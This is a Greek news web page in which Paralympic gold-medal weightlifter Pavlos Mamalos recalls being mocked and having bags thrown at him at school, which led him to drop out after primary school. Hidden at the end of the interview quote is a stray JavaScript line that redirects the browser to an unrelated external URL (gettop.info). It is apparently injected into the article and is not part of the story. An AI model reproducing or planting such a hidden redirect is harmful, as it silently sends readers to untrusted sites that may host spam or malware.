Συγκλονίζει ο Μάμαλος: Στο σχολείο με αποκαλούσαν κούτσαβο και μου πετούσαν τσάντες

0
10

 

Ο Παύλος Μάμαλος στέφθηκε χρυσός Παραολυμπιονίκης στην άρση βαρών στο Ρίο και μπορεί όλοι σήμερα να τον θαυμάζουμε αλλά εκείνος έχει τις σκοτεινές σελίδες στη ζωή του… Σημάδια που κράτησε από τη σχολική του ζωή όταν δεχόταν ρατσισμό και bullying.

Σε παλαιότερη συνέντευξή του ο χρυσός Παραολυμπιονίκης αποκάλυψε όλα όσα τον στιγμάτισαν στο σχολείο και τον ανάγκασαν ακόμη και να μην πάει ποτέ στο Γυμνάσιο!

«Τα παιδιά με κοροϊδεύανε, με λέγανε ανάπηρο, κούτσαβο και τέτοια πράγματα. Εγώ καθόμουν σε μια γωνιά και έκλαιγα, όταν κτύπαγε το κουδούνι και ανέβαιναν τα παιδιά πάνω, εγώ καθόμουν από κάτω και έκλαιγα. Μου πετούσαν τις τσάντες από το παράθυρο και μου ερχόντουσαν στο κεφάλι και με κορόιδευαν. Δεν με παίρνανε σε εκδρομές, δεν με παίρνανε σε πενταήμερες, καθόμουν μόνος στο σχολείο μέχρι να γυρίσουν τα άλλα παιδιά και έτσι κάποτε, όταν έφτασα στην έκτη δημοτικού, τα παράτησα το σχολείο τελείως και δεν πήγα γυμνάσιο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here